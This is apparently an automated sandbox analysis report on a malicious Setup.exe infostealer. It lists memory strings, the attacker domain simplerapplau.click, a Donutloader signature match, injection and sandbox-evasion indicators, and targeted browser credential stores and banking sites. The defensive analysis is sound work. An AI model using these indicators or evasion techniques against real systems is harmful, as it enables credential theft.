                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Setup.exeString found in binary or memory: https://sectigo.com/CPS0
                  Source: Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.cl
                  Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/
                  Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/(w
                  Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/CY/
                  Source: Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1826294302.00000000011AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/api
                  Source: Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/api(
                  Source: Setup.exe, 00000000.00000003.1888928350.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892255892.00000000011AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/apia
                  Source: Setup.exe, 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/apicg
                  Source: Setup.exe, 00000000.00000003.1826294302.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1765557136.0000000001190000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892093250.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1703033346.0000000001189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/apihdmo
                  Source: Setup.exe, 00000000.00000002.1892093250.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/apiiipp
                  Source: Setup.exe, 00000000.00000003.1826294302.00000000011AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/apil
                  Source: Setup.exe, 00000000.00000003.1888928350.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1892255892.00000000011AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/apiv
                  Source: Setup.exe, 00000000.00000003.1602909943.0000000001123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/f-cach
                  Source: Setup.exe, 00000000.00000003.1703033346.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/otCW.
                  Source: Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891589688.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/pi
                  Source: Setup.exe, 00000000.00000003.1703033346.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1888928350.0000000001172000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1764468215.0000000001172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click/ur
                  Source: Setup.exe, 00000000.00000003.1764468215.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click:443/api
                  Source: Setup.exe, 00000000.00000003.1888928350.000000000110E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1891400964.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simplerapplau.click:443/apiefault-release/key4.dbPK
                  Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: Setup.exeString found in binary or memory: https://www.digicert.com/CPS0
                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Setup.exe, 00000000.00000003.1603946194.0000000003E8A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604121736.0000000003E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                  Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                  Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                  Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Setup.exe, 00000000.00000003.1703637759.000000000416D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: Setup.exeString found in binary or memory: https://www.winxdvd.com/
                  Source: Setup.exeString found in binary or memory: https://www.winxdvd.com/Help_Filehelp.chm.chmhelpopenInit_CDROMCD-ROM
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49784 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.88.199:443 -> 192.168.2.7:49805 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C4C695 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_02C4C695
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C002D50_2_02C002D5
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C4C6950_2_02C4C695
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1F2C20_2_02C1F2C2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C272A20_2_02C272A2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1C2720_2_02C1C272
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C232020_2_02C23202
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C292130_2_02C29213
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C262190_2_02C26219
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3E3620_2_02C3E362
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C063720_2_02C06372
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3C33F0_2_02C3C33F
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3B0820_2_02C3B082
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C070B20_2_02C070B2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C180610_2_02C18061
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C050620_2_02C05062
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C000000_2_02C00000
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C2E1180_2_02C2E118
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C186DF0_2_02C186DF
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C0A6F20_2_02C0A6F2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C376820_2_02C37682
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C046620_2_02C04662
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3E6220_2_02C3E622
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C157ED0_2_02C157ED
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C2C7AE0_2_02C2C7AE
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C2C7BD0_2_02C2C7BD
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C207620_2_02C20762
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C387620_2_02C38762
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C2C76E0_2_02C2C76E
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C374220_2_02C37422
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1A58F0_2_02C1A58F
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C225B20_2_02C225B2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1F5520_2_02C1F552
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1955A0_2_02C1955A
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C075720_2_02C07572
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3CAF30_2_02C3CAF3
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C05A120_2_02C05A12
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1EBE20_2_02C1EBE2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C0AB420_2_02C0AB42
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C2CB4C0_2_02C2CB4C
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C23B600_2_02C23B60
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C08B720_2_02C08B72
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C178420_2_02C17842
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1286D0_2_02C1286D
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C2682B0_2_02C2682B
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C299C20_2_02C299C2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C359C20_2_02C359C2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1D9FC0_2_02C1D9FC
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3A9A20_2_02C3A9A2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3E9420_2_02C3E942
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C079120_2_02C07912
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1E9220_2_02C1E922
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C369320_2_02C36932
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C1AEE20_2_02C1AEE2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C0EF810_2_02C0EF81
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C18FA60_2_02C18FA6
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C10F180_2_02C10F18
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3ECA20_2_02C3ECA2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C32C320_2_02C32C32
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C22DE20_2_02C22DE2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3ADE20_2_02C3ADE2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C07DA20_2_02C07DA2
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C37D720_2_02C37D72
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C11D1F0_2_02C11D1F
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C0BD320_2_02C0BD32
                  Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 02C096C2 appears 76 times
                  Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 02C15782 appears 64 times
                  Source: Setup.exeStatic PE information: invalid certificate
                  Source: Setup.exe, 00000000.00000000.1298108804.0000000000929000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Setup.exe
                  Source: Setup.exe, 00000000.00000000.1298108804.0000000000929000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs Setup.exe
                  Source: Setup.exe, 00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Setup.exe
                  Source: Setup.exe, 00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs Setup.exe
                  Source: Setup.exe, 00000000.00000000.1298277526.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename" vs Setup.exe
                  Source: Setup.exe, 00000000.00000003.1483393033.00000000039B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename" vs Setup.exe
                  Source: Setup.exeBinary or memory string: OriginalFileName vs Setup.exe
                  Source: Setup.exeBinary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs Setup.exe
                  Source: Setup.exeBinary or memory string: OriginalFilename" vs Setup.exe
                  Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                  Source: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C009E5 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,0_2_02C009E5
                  Source: Yara matchFile source: Setup.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Setup.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1297460093.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1483393033.000000000318E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Setup.exe, 00000000.00000003.1633746388.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1604740533.0000000003E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Setup.exeString found in binary or memory: dvcmnt.exe /install {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}
                  Source: Setup.exeString found in binary or memory: CIsoMounterMsgFuncdvcmnt.exe /install {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}:%c"dvcmnt.exe" /list {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}%i
                  Source: Setup.exeString found in binary or memory: Please re-install software!DC_MSG_FINISHinvalid vector<T> subscript|3D
                  Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: Setup.exeStatic PE information: More than 747 > 100 exports found
                  Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: Setup.exeStatic file information: File size 10190992 > 1048576
                  Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x527200
                  Source: Setup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x326e00
                  Source: Setup.exeStatic PE information: More than 200 imports for USER32.DLL
                  Source: Setup.exeStatic PE information: real checksum: 0x96d729 should be: 0x9badcd
                  Source: Setup.exeStatic PE information: section name: .didata
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C4167A push edx; iretd 0_2_02C4167B
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C41593 push es; iretd 0_2_02C41595
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3D912 push eax; mov dword ptr [esp], B3B2B180h0_2_02C3D914
                  Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02C3AD52 push eax; mov dword ptr [esp], ACADAEAFh0_2_02C3AD60
                  Source: C:\Users\user\Desktop\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Setup.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exe TID: 6588Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exe TID: 1056Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: Setup.exe, 00000000.00000003.1633246830.0000000003E55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
